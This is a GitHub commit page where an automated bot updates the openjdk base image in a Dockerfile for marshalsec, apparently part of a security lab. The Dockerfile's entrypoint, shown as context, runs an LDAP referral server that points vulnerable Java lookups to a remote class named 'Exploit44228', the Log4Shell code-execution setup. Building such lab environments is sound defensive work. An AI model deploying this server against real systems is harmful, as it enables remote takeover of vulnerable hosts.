Skip to content

Commit

Permalink
Update openjdk Docker tag to v11.0.16-slim-buster
Browse files Browse the repository at this point in the history
  • Loading branch information
renovate[bot] authored Apr 29, 2024
1 parent cb7b66f commit 7da4316
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion docker_images/marshalsec/Dockerfile
Original file line number Diff line number Diff line change
@@ -1,3 +1,3 @@
FROM openjdk:11.0.13-slim-buster@sha256:b0ec82ea34553ea8e44e3b0654c7ee3b236fd15a538bc17634c02315a05ec1e8
FROM openjdk:11.0.16-slim-buster@sha256:6002d5ec6d48870038dc09dbca4e3d4e6fe1f2e7c3d091e7833a86791ff9e7ba
COPY marshalsec/ /marshalsec
ENTRYPOINT ["java","-cp","/marshalsec/target/marshalsec-0.0.3-SNAPSHOT-all.jar", "marshalsec.jndi.LDAPRefServer", "http://host.docker.internal:8888/#Exploit44228"]

0 comments on commit 7da4316

Please sign in to comment.